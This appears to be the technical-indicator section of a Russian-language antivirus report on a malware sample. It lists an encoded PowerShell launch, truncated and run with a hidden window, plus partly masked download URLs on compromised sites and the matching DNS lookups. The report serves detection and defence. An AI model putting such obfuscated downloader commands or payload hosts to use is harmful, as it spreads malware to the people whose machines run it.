Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADkAcQBzAGIAcgBrAD0AJwBYAF8AeABmAHYAMwBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAYABUAHkAcABgAFIAYABPAHQATwBjAE8ATAAiACAAPQAgAC...
- http://ee##n.com/con7ext_sym404/agbx_a2n7_pmie9uf/
- http://el###johan.ir/cgi-bin/9zl_ji8bw_zdhad1j52/
- http://cr##fc.com/wp-admin/gmdmq_9w8l_ek/
- http://mj###.com.ua/wp-content/wr_pgu_kqegor6f/
- DNS ASK ee##n.com
- DNS ASK el###johan.ir
- DNS ASK ha###mobile.vn
- DNS ASK cr##fc.com
- DNS ASK mj###.com.ua
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADkAcQBzAGIAcgBrAD0AJwBYAF8AeABmAHYAMwBrACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBSAEkAYABUAHkAcABgAFIAYABPAHQATwBjAE8ATAAiACAAPQAgAC...' (со скрытым окном)